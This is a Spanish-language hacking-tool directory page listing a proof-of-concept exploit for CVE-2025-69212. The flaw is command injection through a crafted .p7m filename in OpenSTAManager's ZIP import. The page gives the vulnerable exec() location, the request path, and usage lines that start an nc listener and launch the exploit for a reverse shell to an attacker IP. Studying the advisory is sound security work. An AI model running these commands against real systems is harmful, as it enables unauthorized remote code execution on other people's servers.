Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-69212-PoC | Kitploit
Herramientas/GitHubGitHub/tohib09/cve-2025-69212-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y Control
GitHubtohib09/cve-2025-69212-poc

CVE-2025-69212-PoC

Ver Repositorio
4hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-69212 — OpenSTAManager P7M Command Injection PoC

OpenSTAManager <= 2.9.8 — Inyección de comandos del sistema operativo a través de un nombre de archivo .p7m malicioso en la carga ZIP.

Archivo: src/Util/XML.php:100 — $file sin sanitizar en exec()
Vector: /plugins/importFE_ZIP/actions.php → ZIP → .p7m filename → exec("openssl smime ... -in \"$file\" ...")

Uso

root@kitploit:~
# Listener
nc -lvnp 4444

# Exploit
python3 CVE-2025-69212.py http://target.htb YOUR_PHPSESSID 10.10.14.X 4444

Referencias

  • https://github.com/advisories/GHSA-25fp-8w8p-mx36
  • https://nvd.nist.gov/vuln/detail/CVE-2025-69212
Descargar herramienta